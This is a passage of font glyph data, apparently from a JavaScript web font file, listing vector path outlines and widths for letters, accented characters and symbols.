-99,80,-159r41,0xm150,-263r28,52r-30,0r-19,-32r-33,32r-33,0r49,-52r38,0","w":206},{"d":"18,-73v0,-67,25,-122,36,-184r45,0r-36,178v-1,35,24,46,55,46v34,0,60,-13,71,-66r33,-158r45,0r-33,161v-9,42,-28,102,-121,102v-51,0,-95,-25,-95,-79xm215,-276r-102,0r4,-23r103,0","w":266},{"d":"1,0r54,-257r45,0r-54,257r-45,0xm68,-311r40,0r-7,39r-39,0","w":100},{"d":"46,-156r0,-101r37,0r0,101r-37,0","w":100},{"d":"9,-83r9,-40r64,-39r-8,38r-41,25r29,32r-7,34xm79,-83r9,-40r64,-39r-8,38r-41,25r29,32r-7,34","w":166},{"d":"197,-186r-39,186r-38,0r5,-28v-23,44,-123,47,-119,-16v4,-52,19,-94,27,-142r41,0r-27,132v0,6,-1,27,29,27v70,0,62,-99,80,-159r41,0xm174,-224r-102,0r4,-23r103,0","w":206},{"d":"84,-181r-17,85r68,0v40,0,50,-27,50,-50v0,-14,-5,-35,-42,-35r-59,0xm1,0r54,-257r45,0r-8,39r58,0v80,0,80,54,80,78v0,1,-1,80,-94,80r-77,0r-13,60r-45,0","w":240},{"d":"-4,0r38,-186r39,0v-1,9,-7,20,-5,28v23,-45,122,-47,118,16v-4,52,-19,94,-27,142r-41,0r27,-132v0,-6,2,-27,-28,-27v-71,0,-62,99,-80,159r-41,0xm129,-263r45,0r-43,51r-30,0","w":206},{"d":"0,0r54,-257r187,0r-8,39r-143,0r-14,67r132,0r-7,37r-133,0r-15,75r144,0r-8,39r-189,0xm177,-310r29,39r-33,0r-19,-22r-29,22r-35,0r47,-39r40,0","w":226},{"d":"11,-106v0,-108,71,-157,138,-157v68,0,112,46,112,112v0,108,-67,157,-136,157v-73,0,-114,-48,-114,-112xm148,-226v-101,0,-134,195,-21,195v59,0,89,-61,89,-118v0,-48,-23,-77,-68,-77xm200,-310r45,0r-43,38r-26,0xm127,-310r45,0r-42,38r-27,0","w":273},{"d":"-4,0r53,-257r41,0r-53,257r-41,0xm93,-310r47,0r-47,38r-32,0","w":86},{"d":"80,-117r6,-31v35,0,66,-2,67,-40v0,-24,-17,-35,-38,-35v-29,0,-47,20,-52,48r-39,0v8,-49,40,-82,95,-82v38,0,75,20,75,63v1,33,-21,52,-46,61v23,9,31,28,31,52v0,55,-47,86,-102,86v-54,0,-85,-33,-77,-88r39,0v-5,33,13,54,46,54v32,0,53,-21,53,-53v-1,-33,-29,-36,-58,-35"},{"d":"184,-125r-41,0v1,-23,-14,-34,-36,-34v-41,0,-62,47,-62,83v0,65,80,60,89,12r41,0v-13,48,-46,69,-95,69v-49,0,-76,-33,-76,-80v0,-63,40,-116,106,-116v41,0,75,22,74,66xm125,-263r45,0r-42,51r-30,0"},{"d":"179,-148v-3,37,-16,75,-21,112v-1,13,15,8,23,6r-7,30v-23,8,-56,9,-57,-19v-33,36,-120,35,-120,-26v0,-62,62,-64,119,-67v15,-1,22,-10,22,-24v0,-37,-74,-29,-78,6r-39,0v9,-46,44,-61,88,-61v68,0,70,30,70,43xm129,-91v-23,14,-91,-2,-91,40v0,18,18,24,33,24v40,0,53,-29,58,-64xm134,-212r-31,0r-42,-51r45,0"},{"d":"164,-102r-17,-110r-62,110r79,0xm-22,0r154,-257r48,0r45,257r-46,0r-11,-68r-102,0r-39,68r-49,0xm163,-258v-18,0,-34,-16,-34,-34v0,-18,16,-33,34,-33v18,0,33,15,33,33v0,18,-15,34,-33,34xm143,-292v0,11,9,20,20,20v11,0,20,-9,20,-20v0,-11,-9,-20,-20,-20v-11,0,-20,9,-20,20","w":246},{"d":"18,-73v0,-67,25,-122,36,-184r45,0r-36,178v-1,35,24,46,55,46v34,0,60,-13,71,-66r33,-158r45,0r-33,161v-9,42,-28,102,-121,102v-51,0,-95,-25,-95,-79xm187,-311r40,0r-7,39r-40,0xm115,-311r40,0r-7,39r-40,0","w":266},{"d":"60,-171v4,-7,-1,-21,11,-21v19,0,37,-3,37,-23v-7,-29,-54,-17,-57,9r-28,0v6,-36,29,-51,64,-51v24,0,50,11,50,39v1,20,-15,31,-30,37v15,5,20,17,20,32v0,36,-30,54,-67,54v-36,0,-59,-20,-53,-56r29,0v-4,19,7,31,28,31v20,0,34,-12,34,-30v-1,-20,-19,-22,-38,-21","w":119},{"d":"61,0r21,-102r-63,-155r47,0r44,117r90,-117r53,0r-127,159r-20,98r-45,0xm150,-310r48,0r-47,38r-33,0","w":226},{"d":"-4,0r38,-186r39,0r-7,37v15,-26,40,-48,79,-41r-8,39v-86,-12,-83,83,-100,151r-41,0xm-9,48r7,-35r36,0v-8,30,-6,70,-47,72r3,-15v13,-2,18,-10,20,-22r-19,0","w":133},{"d":"249,-149v0,79,-53,159,-158,149r-91,0r24,-114r-23,0r7,-37r24,0r22,-106r95,0v65,0,100,37,100,108xm92,-220r-15,69r70,0r-7,37r-71,0r-16,77r56,0v77,0,95,-87,95,-113v2,-70,-46,-74,-112,-70","w":259},{"d":"86,5v-51,0,-82,-29,-82,-81v0,-61,43,-115,107,-115v51,0,81,28,81,80v0,65,-40,116,-106,116xm108,-159v-42,0,-63,47,-63,84v0,27,13,48,43,48v42,0,63,-46,63,-84v0,-27,-13,-48,-43,-48xm132,-263r45,0r-42,51r-30,0","w":213},{"d":"-9,7v0,-67,83,-67,92,-125r38,0v-5,34,-15,51,-44,70v-21,14,-45,25,-45,54v14,58,87,27,88,-20r41,0v-5,51,-40,86,-92,86v-42,0,-78,-18,-78,-65xm84,-146r10,-45r46,0r-10,45r-46,0"},{"d":"24,-107r4,-24r39,0r-48,-126r43,0r38,117r85,-117r43,0r-96,126r40,0r-5,24r-51,0r-5,24r51,0r-5,24r-51,0r-12,59r-41,0r12,-59r-51,0r5,-24r51,0r5,-24r-51,0"},{"d":"108,-191r19,38r-22,11r-19,-38r-30,32r-17,-16r30,-32r-36,-19r11,-21r37,19r7,-40r24,0r-8,44r41,-6r3,23","w":140},{"d":"-4,0r53,-257r41,0r-53,257r-41,0xm98,-222r8,-35r36,0v-8,30,-7,70,-48,72r3,-14v13,-2,18,-11,20,-23r-19,0","w":108},{"d":"11,-106v0,-108,71,-157,138,-157v68,0,112,46,112,112v0,108,-67,157,-136,157v-73,0,-114,-48,-114,-112xm148,-226v-101,0,-134,195,-21,195v59,0,89,-61,89,-118v0,-48,-23,-77,-68,-77xm168,-310r48,0r-47,38r-33,0","w":273},{"d":"1,0r54,-257r45,0r-54,257v-33,21,-47,35,-47,47v0,19,21,16,32,2r17,2v-12,21,-29,27,-48,27v-10,0,-30,-2,-30,-25v0,-25,33,-43,52,-53r-21,0","w":100},{"d":"28,-203v0,-30,24,-54,54,-54v30,0,54,24,54,54v0,30,-24,54,-54,54v-30,0,-54,-24,-54,-54xm48,-203v0,19,15,34,34,34v19,0,34,-15,34,-34v0,-19,-15,-34,-34,-34v-19,0,-34,15,-34,34","w":144},{"d":"7,0r33,-156r-31,0r6,-30r31,0v5,-55,34,-80,96,-69r-7,32v-32,-8,-46,9,-48,37r36,0r-6,30r-36,0r-33,156r-41,0","w":113},{"d":"0,0r54,-257r187,0r-8,39r-143,0r-14,67r132,0r-7,37r-133,0r-15,75r144,0r-8,39r-189,0xm205,-276r-102,0r4,-23r103,0","w":226},{"d":"179,-148v-3,37,-16,75,-21,112v-1,13,15,8,23,6r-7,30v-23,8,-56,9,-57,-19v-33,36,-120,35,-120,-26v0,-62,62,-64,119,-67v15,-1,22,-10,22,-24v0,-37,-74,-29,-78,6r-39,0v9,-46,44,-61,88,-61v68,0,70,30,70,43xm129,-91v-23,14,-91,-2,-91,40v0,18,18,24,33,24v40,0,53,-29,58,-64xm66,-263r20,0v1,41,69,32,74,0r20,0v-3,64,-119,72,-114,0"},{"d":"141,49r17,2v-12,21,-29,27,-48,27v-10,0,-30,-2,-30,-25v0,-25,33,-43,52,-53r-12,0r5,-28v-23,44,-123,47,-119,-16v4,-52,19,-94,27,-142r41,0r-27,132v0,6,-1,27,29,27v70,0,62,-99,80,-159r41,0r-40,186v-33,21,-48,35,-48,47v0,19,21,16,32,2","w":206},{"d":"-18,69r68,-326r41,0r-19,95v36,-55,128,-26,128,48v0,57,-31,119,-95,119v-28,1,-48,-10,-62,-34r-20,98r-41,0xm54,-75v0,27,12,48,41,48v44,0,64,-44,64,-83v0,-27,-13,-49,-41,-49v-44,0,-64,45,-64,84","w":219},{"d":"76,-29r28,-130v-39,3,-58,48,-58,83v0,24,8,43,30,47xm133,-223r-7,33v34,5,60,27,59,65r-41,0v1,-19,-9,-30,-25,-33r-29,131v23,-1,38,-16,44,-37r41,0v-13,47,-45,68,-92,69r-8,37r-15,0r9,-38v-41,-5,-64,-36,-64,-79v0,-63,40,-116,106,-116r7,-32r15,0"},{"d":"184,-125r-41,0v1,-23,-14,-34,-36,-34v-41,0,-62,47,-62,83v0,65,80,60,89,12r41,0v-13,48,-46,69,-95,69v-49,0,-76,-33,-76,-80v0,-63,40,-116,106,-116v41,0,75,22,74,66xm95,-212r-28,-51r30,0r19,32r33,-32r33,0r-49,51r-38,0"},{"d":"18,-73v0,-67,25,-122,36,-184r45,0r-36,178v-1,35,24,46,55,46v34,0,60,-13,71,-66r33,-158r45,0r-33,161v-9,42,-28,102,-121,102v-51,0,-95,-25,-95,-79xm157,-310r-47,0r47,38r32,0","w":266},{"d":"21,-218r7,-39r212,0r-8,39r-82,0r-45,218r-45,0r45,-218r-84,0xm57,48r7,-35r36,0v-8,30,-6,70,-47,72r2,-15v13,-2,19,-10,21,-22r-19,0","w":213},{"d":"86,5v-51,0,-82,-29,-82,-81v0,-61,43,-115,107,-115v51,0,81,28,81,80v0,65,-40,116,-106,116xm108,-159v-42,0,-63,47,-63,84v0,27,13,48,43,48v42,0,63,-46,63,-84v0,-27,-13,-48,-43,-48xm145,-212r-31,0r-42,-51r45,0","w":213},{"d":"0,0r54,-257r187,0r-8,39r-143,0r-14,67r132,0r-7,37r-133,0r-15,75r144,0r-8,39r-189,0xm141,-311r39,0r-6,39r-40,0","w":226},{"d":"179,-148v-3,37,-16,75,-21,112v-1,13,15,8,23,6r-7,30v-23,8,-56,9,-57,-19v-33,36,-120,35,-120,-26v0,-62,62,-64,119,-67v15,-1,22,-10,22,-24v0,-37,-74,-29,-78,6r-39,0v9,-46,44,-61,88,-61v68,0,70,30,70,43xm129,-91v-23,14,-91,-2,-91,40v0,18,18,24,33,24v40,0,53,-29,58,-64xm142,-253r40,0r-7,39r-40,0xm70,-253r40,0r-7,39r-40,0"},{"d":"-4,0r38,-186r39,0r-7,37v15,-26,40,-48,79,-41r-8,39v-86,-12,-83,83,-100,151r-41,0xm101,-263r45,0r-42,51r-31,0","w":133},{"d":"0,0r54,-257r187,0r-8,39r-143,0r-14,67r132,0r-7,37r-133,0r-15,75r144,0r-8,39r-189,0xm163,-310r48,0r-47,38r-33,0","w":226},{"d":"197,-186r-39,186r-38,0r5,-28v-23,44,-123,47,-119,-16v4,-52,19,-94,27,-142r41,0r-27,132v0,6,-1,27,29,27v70,0,62,-99,80,-159r41,0xm142,-253r40,0r-7,39r-40,0xm70,-253r40,0r-7,39r-40,0","w":206},{"d":"164,-72v0,-67,-132,-22,-132,-111v0,-46,35,-80,96,-80v54,0,97,22,95,82r-43,0v0,-32,-18,-45,-53,-45v-12,0,-50,3,-50,37v0,25,26,32,54,39v36,9,78,19,78,73v0,40,-29,82,-105,83r-13,16v20,-3,42,2,42,24v0,37,-56,37,-82,24r8,-14v15,7,43,12,45,-7v2,-23,-31,-5,-36,-19r19,-25v-52,-4,-84,-31,-82,-90r43,0v-2,40,22,54,59,54v24,0,57,-11,57,-41","w":233},{"d":"86,5v-51,0,-82,-29,-82,-81v0,-61,43,-115,107,-115v51,0,81,28,81,80v0,65,-40,116,-106,116xm108,-159v-42,0,-63,47,-63,84v0,27,13,48,43,48v42,0,63,-46,63,-84v0,-27,-13,-48,-43,-48xm100,-257v27,0,58,35,69,0r21,0v-3,18,-17,43,-38,43v-23,-1,-60,-37,-68,-1r-22,0v5,-20,15,-42,38,-42","w":213},{"d":"134,-58r41,0v-13,43,-46,63,-90,63v-47,0,-81,-31,-81,-81v0,-57,36,-115,103,-115v75,0,83,57,77,109r-139,0v-2,32,8,55,44,55v22,0,39,-12,45,-31xm49,-109r96,0v3,-30,-10,-49,-39,-50v-31,0,-49,21,-57,50xm124,-263r45,0r-43,51r-30,0"},{"d":"18,-154r7,-32r149,0r-7,30r-122,124r105,0r-7,32r-161,0r7,-30r123,-124r-94,0xm82,-212r-28,-51r30,0r19,32r33,-32r33,0r-49,51r-38,0","w":173},{"d":"103,-113r-7,32v-10,0,-34,5,-39,26v-11,50,-11,128,-72,124r-33,0r7,-33v62,10,50,-54,62,-95v8,-30,35,-35,45,-39v-13,2,-34,-14,-29,-40r16,-77v3,-16,-20,-17,-38,-16r7,-32v40,-4,77,4,68,49r-15,78v0,18,19,23,28,23","w":106},{"d":"193,-90r45,0v-17,68,-59,98,-122,96r-13,16v20,-3,41,2,41,24v-2,37,-55,37,-81,24r7,-14v15,7,42,11,46,-7v1,-23,-32,-5,-37,-19r21,-26v-58,-10,-89,-54,-89,-110v0,-108,71,-157,138,-157v61,0,104,33,102,92r-45,0v0,-36,-21,-55,-58,-55v-101,0,-134,195,-21,195v46,0,61,-41,66,-59","w":259},{"d":"252,-135r-29,135r-29,0r0,-27v-63,74,-183,14,-183,-79v0,-108,71,-157,138,-157v60,0,107,28,107,88r-45,0v-2,-35,-25,-51,-63,-51v-101,0,-134,195,-21,195v44,0,68,-29,78,-70r-71,0r7,-34r111,0xm93,48r7,-35r36,0v-8,30,-6,70,-47,72r3,-15v13,-2,18,-10,20,-22r-19,0","w":273},{"d":"1,0r54,-257r45,0r-54,257r-45,0xm69,-310r-47,0r47,38r32,0","w":100},{"d":"197,-186r-39,186r-38,0r5,-28v-23,44,-123,47,-119,-16v4,-52,19,-94,27,-142r41,0r-27,132v0,6,-1,27,29,27v70,0,62,-99,80,-159r41,0xm166,-263r45,0r-42,51r-27,0xm94,-263r45,0r-43,51r-27,0","w":206},{"d":"182,-103r-4,27r-34,0r-11,76r-29,0r11,-76r-40,0r-11,76r-28,0r10,-76r-34,0r4,-27r34,0r7,-46r-34,0r3,-27r34,0r11,-76r29,0r-11,76r40,0r10,-76r29,0r-10,76r34,0r-3,27r-35,0r-6,46r34,0xm125,-149r-40,0r-6,46r40,0"},{"d":"-4,0r38,-186r39,0r-7,37v15,-26,40,-48,79,-41r-8,39v-86,-12,-83,83,-100,151r-41,0xm68,-212r-28,-51r30,0r19,32r33,-32r33,0r-49,51r-38,0","w":133},{"d":"0,0r54,-257r111,0v22,0,81,2,81,65v1,42,-24,62,-58,71v49,16,12,79,28,121r-48,0v-6,-24,3,-51,2,-76v-2,-48,-61,-25,-102,-30r-22,106r-46,0xm92,-220r-17,80v56,1,129,7,126,-47v-3,-49,-65,-29,-109,-33xm113,-272r-28,-38r32,0r19,21r30,-21r35,0r-48,38r-40,0","w":253},{"d":"164,-102r-17,-110r-62,110r79,0xm-22,0r154,-257r48,0r45,257r-46,0r-11,-68r-102,0r-39,68r-49,0xm184,-310r28,39r-32,0r-19,-22r-29,22r-36,0r48,-39r40,0","w":246},{"d":"72,-33r8,-39r40,-24r-29,-33r8,-33r45,49r-9,40xm2,-33r8,-39r40,-24r-28,-33r7,-33r46,49r-9,40","w":166},{"d":"106,-263r-69,332r-81,0r7,-33r41,0r55,-267r-40,0r7,-32r80,0","w":106},{"d":"0,0r54,-257r111,0v22,0,81,2,81,65v1,42,-24,62,-58,71v49,16,12,79,28,121r-48,0v-6,-24,3,-51,2,-76v-2,-48,-61,-25,-102,-30r-22,106r-46,0xm92,-220r-17,80v56,1,129,7,126,-47v-3,-49,-65,-29,-109,-33xm81,48r8,-35r36,0v-8,30,-7,70,-48,72r3,-15v13,-2,18,-10,20,-22r-19,0","w":253},{"d":"86,5v-51,0,-82,-29,-82,-81v0,-61,43,-115,107,-115v51,0,81,28,81,80v0,65,-40,116,-106,116xm108,-159v-42,0,-63,47,-63,84v0,27,13,48,43,48v42,0,63,-46,63,-84v0,-27,-13,-48,-43,-48xm145,-253r39,0r-7,39r-39,0xm73,-253r39,0r-7,39r-39,0","w":213},{"d":"46,-127r8,-31r33,0v15,-56,24,-120,110,-103r-9,32v-46,-13,-48,37,-58,71r38,0r-7,31r-39,0v-19,56,-23,124,-55,169v-14,20,-43,22,-72,17r9,-32v21,7,36,-7,41,-26r35,-128r-34,0"},{"d":"115,-92r23,-106r-98,106r75,0xm190,-92r-6,32r-35,0r-12,60r-41,0r12,-60r-108,0r8,-39r141,-153r41,0r-34,160r34,0"},{"d":"134,-58r41,0v-13,43,-46,63,-90,63v-47,0,-81,-31,-81,-81v0,-57,36,-115,103,-115v75,0,83,57,77,109r-139,0v-2,32,8,55,44,55v22,0,39,-12,45,-31xm49,-109r96,0v3,-30,-10,-49,-39,-50v-31,0,-49,21,-57,50xm147,-263r28,52r-31,0r-18,-32r-34,32r-33,0r49,-52r39,0"},{"d":"1,0r54,-257r45,0r-46,218r130,0r-8,39r-175,0xm121,-310r47,0r-47,38r-32,0","w":206},{"d":"-29,0r185,-257r205,0r-9,39r-125,0r-14,67r117,0r-7,37r-117,0r-16,75r127,0r-8,39r-171,0r14,-66r-83,0r-46,66r-52,0xm176,-220r-83,120r67,0r25,-120r-9,0","w":346},{"d":"133,-53r-39,-65v-18,9,-49,27,-49,54v0,53,66,41,88,11xm179,-49r32,49r-46,0r-14,-24v-42,49,-145,36,-145,-42v0,-41,37,-65,70,-80v-38,-42,-13,-117,47,-117v34,0,64,18,64,59v0,35,-33,55,-61,70r34,54v5,-6,16,-20,21,-42r37,0v-4,25,-20,53,-39,73xm125,-233v-37,-2,-36,52,-16,73v17,-10,41,-21,41,-44v0,-19,-11,-29,-25,-29","w":240},{"d":"149,-128r-94,86v7,9,18,15,33,15v47,-1,69,-55,61,-101xm48,-56r95,-86v-6,-10,-18,-17,-35,-17v-47,2,-71,58,-60,103xm-10,-3r27,-24v-38,-70,13,-167,94,-164v27,0,48,8,61,22r26,-23r9,11r-26,24v33,72,-13,162,-95,162v-26,0,-46,-7,-60,-21r-26,24","w":213},{"d":"1,-64r41,0v0,21,13,35,36,35v46,0,62,-47,66,-82v-13,17,-32,25,-54,25v-19,0,-74,-2,-74,-79v0,-52,38,-92,89,-92v96,0,86,93,86,103v0,62,-27,159,-116,159v-42,0,-73,-24,-74,-69xm100,-118v57,4,73,-105,9,-105v-60,-3,-75,105,-9,105"},{"d":"0,0r54,-257r111,0v22,0,81,2,81,65v1,42,-24,62,-58,71v49,16,12,79,28,121r-48,0v-6,-24,3,-51,2,-76v-2,-48,-61,-25,-102,-30r-22,106r-46,0xm92,-220r-17,80v56,1,129,7,126,-47v-3,-49,-65,-29,-109,-33","w":253},{"d":"137,-213v0,43,-81,65,-97,90r82,0r-6,25r-114,0v6,-45,46,-67,83,-84v33,-15,28,-49,-2,-50v-18,0,-32,13,-34,31r-29,0v4,-37,27,-56,64,-56v28,0,53,12,53,44","w":119},{"d":"17,-34r134,-57r-134,-57r0,-37r182,81r0,26r-182,81r0,-37","w":216},{"d":"16,-114r42,-138r138,0r-7,37r-105,0v-5,20,-16,41,-18,60v48,-36,118,-2,118,60v0,61,-43,100,-102,100v-48,0,-82,-26,-81,-76r41,0v1,27,15,42,43,42v63,0,82,-109,14,-108v-20,0,-36,9,-46,23r-37,0"},{"d":"251,-171r-45,0v0,-36,-21,-55,-58,-55v-101,0,-134,195,-21,195v46,0,61,-41,66,-59r45,0v-15,65,-59,96,-113,96v-73,0,-114,-48,-114,-112v0,-108,71,-157,138,-157v61,0,104,33,102,92xm134,-272r-28,-38r32,0r19,21r29,-21r36,0r-48,38r-40,0","w":259},{"d":"30,-208r5,-21v22,0,44,-9,51,-25r26,0r-35,156r-33,0r25,-114v-11,3,-25,4,-39,4","w":119},{"d":"154,-172v0,-26,-8,-51,-38,-51v-52,0,-71,102,-71,143v0,26,8,51,38,51v52,0,71,-102,71,-143xm4,-91v0,-10,7,-166,116,-166v54,0,75,34,75,96v0,32,-18,166,-117,166v-54,0,-74,-39,-74,-96"},{"d":"137,-157r-5,21v-16,5,-42,0,-39,-16v-20,27,-80,25,-81,-14v0,-40,41,-40,79,-43v9,0,13,-7,13,-15v-5,-15,-45,-13,-47,7r-30,0v6,-30,28,-40,60,-40v85,0,34,46,35,97v-1,8,10,4,15,3xm42,-170v9,34,58,2,54,-14v0,-3,4,-9,2,-11v-15,12,-52,-2,-56,25","w":120},{"d":"179,-148v-3,37,-16,75,-21,112v-1,13,15,8,23,6r-7,30v-23,8,-56,9,-57,-19v-33,36,-120,35,-120,-26v0,-62,62,-64,119,-67v15,-1,22,-10,22,-24v0,-37,-74,-29,-78,6r-39,0v9,-46,44,-61,88,-61v68,0,70,30,70,43xm129,-91v-23,14,-91,-2,-91,40v0,18,18,24,33,24v40,0,53,-29,58,-64xm126,-263r45,0r-42,51r-31,0"},{"d":"18,-73v0,-67,25,-122,36,-184r45,0r-36,178v-1,35,24,46,55,46v34,0,60,-13,71,-66r33,-158r45,0r-33,161v-9,42,-28,102,-121,102v-51,0,-95,-25,-95,-79xm206,-310r45,0r-42,38r-27,0xm134,-310r45,0r-43,38r-27,0","w":266},{"d":"0,0r54,-257r49,0r80,192r39,-192r45,0r-54,257r-49,0r-80,-191r-39,191r-45,0xm139,-272r-28,-38r32,0r19,21r30,-21r35,0r-48,38r-40,0","w":259},{"d":"3,0r10,-45r46,0r-9,45r-47,0xm30,-72v6,-65,14,-128,28,-185r44,0v-12,67,-32,126,-51,185r-21,0","w":106},{"d":"61,-99r-41,-87r44,0r26,59r48,-59r47,0r-79,90r48,96r-45,0r-30,-68r-57,68r-47,0","w":180},{"d":"86,5v-51,0,-82,-29,-82,-81v0,-61,43,-115,107,-115v51,0,81,28,81,80v0,65,-40,116,-106,116xm108,-159v-42,0,-63,47,-63,84v0,27,13,48,43,48v42,0,63,-46,63,-84v0,-27,-13,-48,-43,-48xm175,-224r-102,0r4,-23r103,0","w":213},{"d":"-4,0r53,-257r41,0r-53,257r-41,0xm-10,48r7,-35r36,0v-8,30,-6,70,-47,72r3,-15v13,-2,18,-10,20,-22r-19,0","w":86},{"d":"134,-58r41,0v-13,43,-46,63,-90,63v-47,0,-81,-31,-81,-81v0,-57,36,-115,103,-115v75,0,83,57,77,109r-139,0v-2,32,8,55,44,55v22,0,39,-12,45,-31xm49,-109r96,0v3,-30,-10,-49,-39,-50v-31,0,-49,21,-57,50xm173,-224r-102,0r4,-23r102,0"},{"d":"29,-161r20,-96r41,0r-13,64r33,-23r-5,26r-34,22r-34,168r-41,0r28,-136r-29,20r5,-25","w":86},{"d":"196,-198v0,66,-85,65,-92,125r-38,0v5,-34,15,-51,44,-70v21,-14,45,-25,45,-54v-13,-57,-89,-28,-88,20r-41,0v5,-51,40,-86,92,-86v42,0,78,18,78,65xm47,0r10,-45r46,0r-10,45r-46,0"},{"d":"41,-178r7,-32v33,0,66,-13,82,-42r33,0r-53,252r-43,0r38,-184v-22,5,-42,6,-64,6"},{"d":"18,-73v0,-67,25,-122,36,-184r45,0r-36,178v-1,35,24,46,55,46v34,0,60,-13,71,-66r33,-158r45,0r-33,161v-9,42,-28,102,-121,102v-51,0,-95,-25,-95,-79xm173,-310r47,0r-47,38r-32,0","w":266},{"d":"206,-186r-40,181v-12,57,-35,79,-94,79v-41,0,-79,-16,-80,-60r41,0v1,21,20,29,43,29v44,0,51,-33,56,-71v-36,53,-125,26,-125,-48v0,-56,34,-115,96,-115v27,0,48,10,58,36r6,-31r39,0xm48,-78v0,25,11,46,39,46v44,0,62,-45,62,-83v0,-27,-15,-44,-42,-44v-40,0,-59,47,-59,81xm71,-263r20,0v1,40,69,33,74,0r20,0v-3,64,-119,71,-114,0","w":213},{"d":"47,9r151,-270r28,0r-151,270r-28,0xm26,-208r5,-21v22,0,44,-9,51,-25r26,0r-35,156r-33,0r25,-114v-11,3,-25,4,-39,4xm302,-115v0,43,-81,65,-97,90r82,0r-6,25r-114,0v6,-45,47,-67,83,-84v33,-15,30,-50,-2,-51v-21,0,-33,15,-34,33r-29,0v3,-36,23,-59,63,-59v31,0,54,14,54,46","w":300},{"d":"22,6r0,-269r36,0r0,269r-36,0","w":79},{"d":"179,-148v-3,37,-16,75,-21,112v-1,13,15,8,23,6r-7,30v-23,8,-56,9,-57,-19v-33,36,-120,35,-120,-26v0,-62,62,-64,119,-67v15,-1,22,-10,22,-24v0,-37,-74,-29,-78,6r-39,0v9,-46,44,-61,88,-61v68,0,70,30,70,43xm129,-91v-23,14,-91,-2,-91,40v0,18,18,24,33,24v40,0,53,-29,58,-64xm118,-205v-20,0,-37,-17,-37,-37v0,-20,17,-37,37,-37v20,0,37,17,37,37v0,20,-17,37,-37,37xm96,-242v0,12,10,22,22,22v12,0,22,-10,22,-22v0,-12,-10,-22,-22,-22v-12,0,-22,10,-22,22"},{"d":"98,-263r35,0v-74,88,-107,204,-67,332r-31,0v-51,-123,-18,-250,63,-332","w":106},{"d":"43,-6r-33,-180r44,0r20,136r70,-136r44,0r-107,192v-20,42,-44,79,-104,65r8,-34v17,5,33,3,42,-13xm118,-263r45,0r-42,51r-31,0","w":180},{"d":"37,0r-41,0r38,-186r41,0xm71,-263r45,0r-43,51r-30,0","w":86},{"d":"0,0r54,-257r187,0r-8,39r-143,0r-14,67r132,0r-7,37r-133,0r-15,75r144,0r-8,39r-189,0xm174,-311r39,0r-6,39r-40,0xm102,-311r39,0r-6,39r-40,0","w":226},{"d":"164,-102r-17,-110r-62,110r79,0xm-22,0r154,-257r48,0r45,257r-46,0r-11,-68r-102,0r-39,68r-49,0xm210,-276r-103,0r5,-23r102,0","w":246},{"d":"-4,0r38,-186r39,0v-1,9,-7,20,-5,28v23,-45,122,-47,118,16v-4,52,-19,94,-27,142r-41,0r27,-132v0,-6,2,-27,-28,-27v-71,0,-62,99,-80,159r-41,0xm53,48r7,-35r36,0v-8,30,-6,70,-47,72r3,-15v13,-2,18,-10,20,-22r-19,0","w":206},{"d":"1,0r54,-257r45,0r-54,257r-45,0","w":100},{"d":"61,0r21,-102r-63,-155r47,0r44,117r90,-117r53,0r-127,159r-20,98r-45,0xm158,-311r40,0r-7,39r-39,0xm86,-311r40,0r-7,39r-39,0","w":226},{"d":"0,0r54,-257r49,0r80,192r39,-192r45,0r-54,257r-49,0r-80,-191r-39,191r-45,0xm82,48r8,-35r36,0v-8,30,-7,70,-48,72r3,-15v13,-2,19,-10,21,-22r-20,0","w":259},{"d":"1,0r54,-257r45,0r-46,218r130,0r-8,39r-175,0xm67,48r7,-35r36,0v-8,30,-6,70,-47,72r3,-15v13,-2,18,-10,20,-22r-19,0","w":206},{"d":"74,9r151,-270r28,0r-151,270r-28,0xm46,-206r-29,0v6,-35,30,-51,64,-51v24,0,50,11,50,39v1,20,-14,31,-29,37v15,5,20,17,20,32v0,36,-31,54,-68,54v-37,0,-56,-19,-53,-56r29,0v-2,20,8,30,29,31v20,0,34,-12,34,-30v-1,-19,-19,-22,-38,-21v3,-7,-2,-21,10,-21v19,0,38,-3,38,-23v-7,-29,-55,-18,-57,9xm244,-62v3,-18,11,-39,12,-55r-54,55r42,0xm297,-62r-6,27r-21,0r-8,35r-33,0r8,-35r-70,0r5,-26r92,-96r35,0r-22,95r20,0","w":300},{"d":"37,0r-25,-186r43,0r16,136r72,-136r43,0r-103,186r-46,0","w":180},{"d":"202,-188r-41,0v0,-21,-12,-35,-33,-35v-43,0,-65,47,-71,82v42,-52,128,-17,128,54v0,52,-41,92,-89,92v-63,0,-88,-38,-88,-101v0,-17,8,-161,120,-161v43,0,73,24,74,69xm93,-29v58,2,74,-104,8,-104v-61,-5,-73,104,-8,104"},{"d":"1,0r54,-257r45,0r-54,257r-45,0xm103,-311r40,0r-7,39r-40,0xm31,-311r40,0r-7,39r-40,0","w":100},{"d":"79,-146r-46,0r9,-45r47,0xm41,-120r21,0r-12,111r-15,75r-45,0v12,-67,32,-126,51,-186","w":106},{"d":"-4,0r53,-257r41,0r-30,146r85,-75r52,0r-83,68r46,118r-46,0r-32,-90r-32,27r-13,63r-41,0","w":186},{"d":"252,-135r-29,135r-29,0r0,-27v-63,74,-183,14,-183,-79v0,-108,71,-157,138,-157v60,0,107,28,107,88r-45,0v-2,-35,-25,-51,-63,-51v-101,0,-134,195,-21,195v44,0,68,-29,78,-70r-71,0r7,-34r111,0","w":273},{"d":"-2,0r53,-257r45,0r-21,102r120,0r21,-102r45,0r-53,257r-45,0r24,-116r-120,0r-24,116r-45,0","w":259},{"d":"115,-54v0,-37,-98,-24,-98,-80v0,-41,39,-57,77,-57v40,0,73,13,72,59r-39,0v0,-19,-15,-27,-37,-27v-16,0,-32,6,-32,24v0,17,29,19,55,29v22,8,43,21,43,50v0,43,-41,61,-82,61v-43,0,-77,-14,-78,-65r39,0v-1,23,17,33,41,33v17,0,39,-6,39,-27xm84,-212r-28,-51r30,0r19,32r33,-32r33,0r-49,51r-38,0","w":180},{"d":"-4,0r53,-257r41,0r-30,146r85,-75r52,0r-83,68r46,118r-46,0r-32,-90r-32,27r-13,63r-41,0xm46,48r8,-35r36,0v-8,30,-7,70,-48,72r3,-15v13,-2,19,-10,21,-22r-20,0","w":186},{"w":100},{"d":"-6,8r40,-194r41,0r-49,226v-10,32,-39,38,-74,32r7,-33v22,9,31,-10,35,-31xm41,-218r8,-39r41,0r-8,39r-41,0","w":86},{"d":"199,-73r-182,0r0,-36r182,0r0,36xm108,-139v-14,0,-26,-12,-26,-26v0,-14,12,-26,26,-26v14,0,26,12,26,26v0,13,-12,26,-26,26xm108,9v-14,0,-26,-12,-26,-26v0,-14,12,-26,26,-26v14,0